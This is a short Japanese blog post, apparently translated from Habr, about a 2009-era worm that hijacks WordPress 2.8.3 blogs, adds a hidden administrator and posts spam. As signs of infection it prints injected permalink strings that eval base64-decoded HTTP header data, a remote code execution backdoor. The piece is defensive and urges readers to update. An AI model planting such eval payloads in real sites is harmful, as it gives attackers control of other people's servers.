WordPressワームの流行

1か月前、WordPress 2.8.3の新しい重大な脆弱性について知られるようになり、管理者パスワードをリモートで簡単に変更できるようになりました。 この脆弱性を修正するために、WordPress 2.8.4 すぐにリリースされました 。 結局のところ、すべてのブロガーが更新をフォローしているわけではありません。

今週末、新しいウイルスの真の流行が勃発し、WordPress 2.8.3およびブランチ2.8の以前のバージョンのエンジンでブログに感染しました。 ワームはブログにログインし、パーマリンク構造を介して悪意のあるコードを起動し、2番目の管理者になります。その後、ユーザーページから自分自身を消去するスクリプトを実行し、アーカイブトピックのスパムとリンクを静かに追加し始めます。

害虫の存在をすぐに検出することは、特に何も発表していない場合は特に困難です。 これを行うには、permalinks / rssフィードで次のコードの存在を確認します。

%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/

または

“/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%

または間違い

'error on line 22 at column 71: xmlParseEntityRef: no name wordpress'

そのようなコードがあるか、フィードが壊れている場合、ブログは感染しています。

ワーム駆除手順は簡単な作業です。

ところで、Matt Mullenwegはセキュリティのトピックに関する大きな記事を作成しました。そこでは、ユーザーに絶えず新しいアップデートを監視してインストールするように促しています。ここではWordPressのアップグレード手順を説明します 。 これは、今回および将来の流行から身を守る唯一の方法です。

Source: https://habr.com/ru/post/J68905/


All Articles